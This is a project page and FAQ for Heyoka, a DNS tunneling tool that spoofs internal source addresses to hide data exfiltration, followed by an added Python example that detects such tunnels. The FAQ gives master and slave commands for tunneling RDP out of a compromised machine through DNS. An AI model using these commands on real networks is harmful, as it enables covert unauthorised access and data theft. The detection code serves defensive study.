About
"Heyoka are thought of as being backwards-forwards, upside-down, or contrary in nature. This spirit is often manifest by doing things backwards or unconventionally -- riding a horse backwards, wearing clothes inside-out, or speaking in a backwards language." (source Wikipedia)
Heyoka is a DNS tunneling tool aiming for both performance and stealth, released under the GPLv2.
The tunnel is up to 60% faster compared to existing tools, thanks to a different encoding that is used in the packets. Additionally, heyoka can spread traffic across multiple name servers and spoof the source addresses of other hosts within the network. This way, the traffic signature gets spread across the whole internal network, making the tunnel endpoint significantly harder to spot.
Heyoka is 100% written in C, which means that it runs natively without the need for interpreters installed on the machine, which is extremely useful in a penetration testing scenario.
The overall idea is to create a useful tunneling tool, and at the same time investigate new patterns of data exfiltration that use spoofed packets to avoid detection.
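Because the paragraphs above describe how spoofed source addresses spread the tunnel's signature across the internal network, the defender's side of that claim is worth showing. The following is an added example and not part of the Heyoka project: a small Python script that aggregates DNS query logs per parent domain instead of per source host, so that long, high-entropy, never-repeating subdomain labels still stand out when every (spoofed) source sends only a single query. The log entries, the domain name tunnel-placeholder.net, the threshold values and all function names are constructed assumptions for this illustration.

```python
import math
from collections import Counter, defaultdict

# Constructed sample of resolver query logs as (source IP, queried name).
# The first five entries are ordinary traffic; the remaining ones mimic a
# tunnel client that rotates spoofed internal source addresses under one
# parent domain (tunnel-placeholder.net is a placeholder, not a real host).
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.5", "mail.example.com"),
    ("10.0.0.9", "cdn.example.com"),
    ("10.0.0.7", "www.example.com"),
    ("10.0.0.11", "api.example.com"),
    ("10.0.0.21", "5kx3q9z2wv7bn4lp0.tunnel-placeholder.net"),
    ("10.0.0.22", "7hq2mz8vc4x1ybj6rt.tunnel-placeholder.net"),
    ("10.0.0.23", "kz9p3w1vq7m2bx5nc8.tunnel-placeholder.net"),
    ("10.0.0.24", "2yb7xq4mv9kz1w5hpn.tunnel-placeholder.net"),
    ("10.0.0.25", "m4v8k1zq7x2wbp9y3c.tunnel-placeholder.net"),
    ("10.0.0.26", "q1w7zx3vm9k5bp2n8y.tunnel-placeholder.net"),
]


def split_name(qname, levels=2):
    """Split a query name into (subdomain part, parent domain of `levels` labels)."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[:-levels]), ".".join(labels[-levels:])


def shannon_entropy(text):
    """Bits of entropy per character; encoded payload labels score high."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def flag_noisy_sources(queries, threshold=5):
    """Naive per-host detector: sources that sent more than `threshold` queries.
    Source spoofing defeats this, because no single address exceeds the limit."""
    per_source = Counter(src for src, _ in queries)
    return sorted(src for src, count in per_source.items() if count > threshold)


def summarize_by_domain(queries, levels=2):
    """Aggregate indicators per parent domain, independent of the source host."""
    acc = defaultdict(lambda: {"queries": 0, "sources": Counter(),
                               "subdomains": set(), "entropy": 0.0, "length": 0})
    for src, qname in queries:
        sub, domain = split_name(qname, levels)
        s = acc[domain]
        s["queries"] += 1
        s["sources"][src] += 1
        s["subdomains"].add(sub)
        s["entropy"] += shannon_entropy(sub)
        s["length"] += len(sub)
    summary = {}
    for domain, s in acc.items():
        summary[domain] = {
            "queries": s["queries"],
            "distinct_sources": len(s["sources"]),
            "max_queries_per_source": max(s["sources"].values()),
            "unique_subdomain_ratio": len(s["subdomains"]) / s["queries"],
            "mean_entropy": s["entropy"] / s["queries"],
            "mean_subdomain_len": s["length"] / s["queries"],
        }
    return summary


def flag_tunnel_domains(summary, min_queries=5, min_entropy=3.5,
                        min_len=12, min_unique_ratio=0.9):
    """Domains whose subdomain labels look like encoded payload: many queries,
    almost never repeated, long and high-entropy. Thresholds are assumptions."""
    return sorted(
        d for d, s in summary.items()
        if s["queries"] >= min_queries
        and s["mean_entropy"] >= min_entropy
        and s["mean_subdomain_len"] >= min_len
        and s["unique_subdomain_ratio"] >= min_unique_ratio
    )


if __name__ == "__main__":
    print("per-host detector flags:", flag_noisy_sources(SAMPLE_QUERIES))
    summary = summarize_by_domain(SAMPLE_QUERIES)
    for domain, s in summary.items():
        print(domain, {k: round(v, 2) if isinstance(v, float) else v for k, v in s.items()})
    print("per-domain detector flags:", flag_tunnel_domains(summary))
```

On the constructed sample the per-host counter flags nothing, because each spoofed address sends one query, while the per-domain view shows six distinct sources, a unique-subdomain ratio of 1.0 and a mean label entropy above 4 bits for the tunnel domain. The practical lesson is that aggregation keys for DNS tunnel detection should include the queried parent domain (and ideally the upstream resolver), not only the client address.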
We presented heyoka at multiple conferences. Have a look at the slides from Shakacon if you want to get a bigger picture ... or just download and try! :)
Download
- heyoka-0.1.3-alpha.zip (source files)
- heyoka-0.1.3-alpha.exe (win32 binaries)
FAQ
What is the purpose of heyoka or a DNS tunnel anyway?
You might find yourself sitting in a locked-down network that only allows traffic to be sent through an authenticated proxy, or not even that. There's a good chance, however, that DNS will be routed through. In that case you can use DNS tunnels to send and receive arbitrary traffic from the "outside world". Alternatively, you might be in a penetration test, and you can run commands with administrative privileges on some machine deep inside the target network that can only communicate with the outside world through DNS requests passed to the internal DNS server. In all these cases, a DNS tunnel can be a reliable (albeit not very fast) way to communicate.
How do I get heyoka to run?
At the moment, there is only one heyoka executable, which is capable of being both the 'master' and the 'slave'. Obviously, this will change in the future.
Start by running heyoka in master mode on the machine which is authoritative name server for the domain you are using. Assuming that you are going to contact some service listening on the other side (e.g.: RDP), the syntax will be as follows:
heyoka.exe -m -d mydomain.com -l -p 8080
This will start the fake DNS server, and create a local listening TCP socket on port 8080. Then start heyoka in slave mode on the internal/compromised machine with the following syntax:
heyoka.exe -s -d mydomain.com -p 3389
This will create the tunnel, and all you have to do is to fire off an RDP client and point it to the 'master' machine on port 8080.
If it's the internal/compromised machine that needs to contact a service on the external box, simply use '-l' (which stands for 'listen') on the master side instead. Keep in mind that the code is in alpha stage, so you might experience crashes and other unexpected behavior.
Which Operating Systems are currently supported?
At the moment heyoka has only been tested on Windows 2003. However, we plan to port the code to *nix operating systems in the near future...
What are your future plans with Heyoka?
The next steps will be to get it off the alpha state as soon as possible and make it a usable tool for everyone. We'll have to fix a lot of bugs, implement a fancy GUI and port it to some other operating systems. Then there are plans to make it available as DLL so that you can easily integrate it into your tool (Heyoka is licensed under the GPL). From there on, we shall see...
Can I contribute?
Sure you can. Just drop us an email.
Who are you?
Two security professionals with too much time on their hands:
- icesurfer: r00t [at] northernfortress [dot] net
- nico: http://www.leidecker.info
Can I buy heyoka t-shirts or mugs?
errr ... no. At least not yet.